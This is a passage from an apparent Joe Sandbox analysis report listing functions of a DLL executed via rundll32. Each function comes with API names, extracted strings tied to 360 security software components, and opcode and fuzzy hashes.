                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: NTDLL.DLL$ZwSetInformationThread
                                                                                                  • API String ID: 1646373207-2735485441
                                                                                                  • Opcode ID: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
                                                                                                  • Instruction ID: b89890f0d555bdc3e142d7496d6436052e72b1d505dadace56c849a3f497b7c1
                                                                                                  • Opcode Fuzzy Hash: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
                                                                                                  • Instruction Fuzzy Hash: 10315472A04B8886E6829B24D5017E86760FB987C4F05E625FF5D62293EF35E7CCC311
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005F014 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73synchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MutexRelease
                                                                                                  • String ID: DELETE FROM 'MT'$select * from sqlite_sequence;$update sqlite_sequence set seq = 0 where name='MT';
                                                                                                  • API String ID: 1638419-14785165
                                                                                                  • Opcode ID: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
                                                                                                  • Instruction ID: 2735ef6a2105b6c033439e84eaa5791c9d84b25ec53eae267885e45c8fb0a052
                                                                                                  • Opcode Fuzzy Hash: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
                                                                                                  • Instruction Fuzzy Hash: 2231CE32305B4982EAA59B64E5903AD6390F78CBE0F089224EF6D57BD1CF69CA598700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180067380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@?terminate@@free
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 3373266647-1018135373
                                                                                                  • Opcode ID: d73ca4be5f3c30bec2958ddaeb0430c1daa0421a04bf28af6faf66de19823b01
                                                                                                  • Instruction ID: 594e821370d35c74b48cca41d1a30539acd19f7ec6fc8343c4dbd888121ab54a
                                                                                                  • Opcode Fuzzy Hash: d73ca4be5f3c30bec2958ddaeb0430c1daa0421a04bf28af6faf66de19823b01
                                                                                                  • Instruction Fuzzy Hash: 6F21F67230174881EFA69F29C4543B927A1EB49FD8F789521EA2D077D6CF29CA89C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005C9F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value_time64
                                                                                                  • String ID: MsgCenter$opentime_afterupdate
                                                                                                  • API String ID: 785988768-2434204715
                                                                                                  • Opcode ID: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
                                                                                                  • Instruction ID: fc05a4dbc7e4eba58b3f0245281c2719f95df9f8cff95e83ed4d87eeecbf7a83
                                                                                                  • Opcode Fuzzy Hash: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
                                                                                                  • Instruction Fuzzy Hash: F021A272600B4887E752CF28D4407897BA0F788BF4F508325BA69537E4DF34C649CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005CDD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@_wcslwrmemset
                                                                                                  • String ID: Global\QIHOO360_%s
                                                                                                  • API String ID: 2483156104-3710684550
                                                                                                  • Opcode ID: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
                                                                                                  • Instruction ID: 82c5ad46f6e7f4dabe07948ff870f9b922604b6aade2c66f9895ca3b1b8f50de
                                                                                                  • Opcode Fuzzy Hash: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
                                                                                                  • Instruction Fuzzy Hash: 5821A171205B8881FBA6DB10E8553EA6360F7897D4F808221B69D077D5EF3DCA49C745
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005B1FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$AddressHandleModuleProc
                                                                                                  • String ID: MsgCenter$opentime_traystartup
                                                                                                  • API String ID: 1929421221-2252518459
                                                                                                  • Opcode ID: 3abeb8fc91df8dd5900424b586f49943e6197e38022a5c10ccb5856e26316cfc
                                                                                                  • Instruction ID: b7589bd7c9edc25a710676dc7680ca351ec7a130bddfa3bcd3ac7e714d28a79a
                                                                                                  • Opcode Fuzzy Hash: 3abeb8fc91df8dd5900424b586f49943e6197e38022a5c10ccb5856e26316cfc
                                                                                                  • Instruction Fuzzy Hash: 5B216F72214A4882E751DF68E84478AB760FB897F4F408301F5BD53AE9DF78C299CB45
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005B0F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID: MsgCenter$opentime_traystartup
                                                                                                  • API String ID: 3702945584-2252518459
                                                                                                  • Opcode ID: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
                                                                                                  • Instruction ID: 822726540527e7bff4823bd2222deb8b26a33040d1884c58a740bbbc5b89d818
                                                                                                  • Opcode Fuzzy Hash: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
                                                                                                  • Instruction Fuzzy Hash: A631C476201B488AEBA18F25D8443D937A4F7487ACF418715EA6C02BE8EF38C258C784
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006A4C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sscanf.LEGACY_STDIO_DEFINITIONS ref: 000000018006A519
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A530
                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A542
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$LocalSystemsscanf
                                                                                                  • String ID: %hu-%hu-%hu %hu:%hu:%hu
                                                                                                  • API String ID: 34346384-1004895946
                                                                                                  • Opcode ID: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
                                                                                                  • Instruction ID: 56cd0a7082cee1cdafaeaa7a6634e2a063740646281a87663471f261b7941616
                                                                                                  • Opcode Fuzzy Hash: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
                                                                                                  • Instruction Fuzzy Hash: 53210472B10B1889FB81DFA4D8803DD33B4B708788F948526EA1D96768EF34C659C750
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001915C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LongNamePathmemsetwcschr
                                                                                                  • String ID: System32
                                                                                                  • API String ID: 1234868084-919923750
                                                                                                  • Opcode ID: 63ae055987751f564649761a82e02fa83986ab2b29aab6a60c23bad4ffdf8bdd
                                                                                                  • Instruction ID: 022cfa0bf7d635e91ec6b184de1930e682d5e478c1da967905a178ce1f931210
                                                                                                  • Opcode Fuzzy Hash: 63ae055987751f564649761a82e02fa83986ab2b29aab6a60c23bad4ffdf8bdd
                                                                                                  • Instruction Fuzzy Hash: DA117536304A4892EBA1DB55E4843DA23A0F78CBD4F948625ABBD437D5DF38C699C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180067610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??1exception@@FileHeadermemset
                                                                                                  • String ID: bad allocation$csm
                                                                                                  • API String ID: 3064007109-2003371537
                                                                                                  • Opcode ID: b6a60749b78c48c230b9495ee51191fab89657cf486f85ec67875e06bd0adf6d
                                                                                                  • Instruction ID: a6dd51a1d05e896956d3c811062f43cd0c17e0d4951ee49045dad2b426ca4241
                                                                                                  • Opcode Fuzzy Hash: b6a60749b78c48c230b9495ee51191fab89657cf486f85ec67875e06bd0adf6d
                                                                                                  • Instruction Fuzzy Hash: 10214772609B8496DB51CF10F4443CEB3A4F3883A0F514229E6AD47BA4DF79CA49CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180040358 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FreeLibraryLoad$FindFolderLockPathQuerySizeofSpecialValuefreemallocmemmovememset
                                                                                                  • String ID: %u.%u.%u$\Internet Explorer\IEXPLORE.EXE
                                                                                                  • API String ID: 28297470-3177478685
                                                                                                  • Opcode ID: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
                                                                                                  • Instruction ID: 8c267d1c97a4f3ae60188c217bf77148b2efdc3265efdf379ec177d08f4db65c
                                                                                                  • Opcode Fuzzy Hash: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
                                                                                                  • Instruction Fuzzy Hash: 95118F32325A8986EB91DB25E4457DB7360F78C789F805012B68A47955DF3DC609CF00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003C7D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$AppendCriticalExistsInitializeModuleNameSection
                                                                                                  • String ID: ..\360NetBase64.dll
                                                                                                  • API String ID: 2373086246-4183035884
                                                                                                  • Opcode ID: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
                                                                                                  • Instruction ID: af5cf4f44f90b4c64e773468feb6851d22c47134ddc293a853e7e5ebda926cde
                                                                                                  • Opcode Fuzzy Hash: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
                                                                                                  • Instruction Fuzzy Hash: 25114C71614A4981FBF3AB60E8953DB23A0FB8D7C9F518115B58D825A5EF28C74DC702
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180002DE4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsncmp$DirectoryPath
                                                                                                  • String ID: \\?\
                                                                                                  • API String ID: 911398208-4282027825
                                                                                                  • Opcode ID: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
                                                                                                  • Instruction ID: 9903006c7179f3997e6314bb7e882962eeb1ce79a0b7cc9db4c5bfd4c7dd6eaa
                                                                                                  • Opcode Fuzzy Hash: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
                                                                                                  • Instruction Fuzzy Hash: E501AD3036568882FBA2EB25EC457E97214BB4CBD0F848235B96A8B1E5DF6CC34DC304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800142E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalFilePathSection$AppendEnterExistsLeaveModuleNamememset
                                                                                                  • String ID: ..\safemon\FreeSaaS.tpi
                                                                                                  • API String ID: 154803636-205188023
                                                                                                  • Opcode ID: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
                                                                                                  • Instruction ID: d74fc56e569283819db6817bdf86699dd223bda9e6afadc26b68049d38556e4d
                                                                                                  • Opcode Fuzzy Hash: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
                                                                                                  • Instruction Fuzzy Hash: B5016D35219A8C82FBE2D721EC693D92790B78D388F80D041A4AA077A1DF2DC30DCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800560C8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000180056109
                                                                                                  • CreateMutexW.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005611D
                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005612B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DescriptorSecurity$ConvertCreateFreeLocalMutexString
                                                                                                  • String ID: D:P(OA;;FA;;;WD)
                                                                                                  • API String ID: 794372803-936388898
                                                                                                  • Opcode ID: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
                                                                                                  • Instruction ID: 0d5b46b33c23d90729eae48064ade5dfd8da35591b75e80b0d34519ac450dbba
                                                                                                  • Opcode Fuzzy Hash: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
                                                                                                  • Instruction Fuzzy Hash: 44014B72A14F4486EB518F21F8487A973E0F78CBD4F468221EA5D87714DF38C658C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018002AD5C Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 381COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                                  • _wcsicmp.MSVCRT ref: 000000018002AE4E
                                                                                                    • Part of subcall function 00000001800275E4: IIDFromString.OLE32(?,?,?,?,?,?,?,00000001800254CC), ref: 000000018002760B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FromHeapProcessString_wcsicmp
                                                                                                  • String ID: $CLSID$ftp:
                                                                                                  • API String ID: 2012545421-381575252
                                                                                                  • Opcode ID: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
                                                                                                  • Instruction ID: d299122ce3e9d517528ccb327dc5a756d1d769515d838a72f3e491c2ced193a8
                                                                                                  • Opcode Fuzzy Hash: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
                                                                                                  • Instruction Fuzzy Hash: 41F14073301B4886EB52DB29D8407DE7361F789BE9F448311AA6D876E5DF78CA49C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006616C Relevance: 6.3, APIs: 5, Instructions: 80COMMON
